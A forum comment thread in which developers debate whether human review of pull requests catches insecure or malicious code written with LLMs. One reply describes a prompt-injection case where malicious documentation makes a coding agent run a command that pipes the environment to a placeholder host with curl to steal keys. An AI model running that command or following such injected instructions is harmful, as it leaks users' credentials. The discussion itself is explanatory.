3 ms·
I was also confused. In our organization all PR’s must always be reviewed by a knowledgeable human. It does not matter if it was all LLM generated or written by
by SamuelAdams 1y ago
I was also confused. In our organization all PR’s must always be reviewed by a knowledgeable human. It does not matter if it was all LLM generated or written by a person.
If insecure code makes it past that then there are bigger issues - why did no one catch this, is the team understanding the tech stack well enough, and did security scanning / tooling fall short, and if so how can that be improved?
- IanCal 1y agoAside from noting that reviews are not perfect and increased attacks is a risk anyway - the other major risk is running code on your dev machine. You may think to review this more for an unknown pr than an llm suggestion.
- reilly3000 1y agoThe attack isn’t bad code. It could be malicious docs that tell the LLM to make a tool call to printenv | curl -X POST https://badsite -d - and steal your keys.
- hgomersall 1y agoWell LLMs are designed to produce code that looks right, which arguably makes the code review process much harder.
- avbanks 1y agoThis is such an overlooked aspect of coding agents, the code review process is significantly harder now because bug/vulnerabilities are being hidden under plausible looking code.
- baby_souffle 1y ago> the code review process is significantly harder now because bug/vulnerabilities are being hidden under plausible looking code. Hasn’t this been the case for entire categories of bugs? Stop me if you’ve heard this one before but we have a new critical 10/10 cvs that was dormant for the last 6 years…it was introduced in this innocuous refactor of some utility function and nobody noticed the subtle logic flaw….
- Cheer2171 1y agoThis has always been a risk, but the likelihood is so much greater with LLMs.
- mns 1y agoI think that you're under the impression that most code reviews in most of the companies out there are more than people just hitting a button in case tests pass.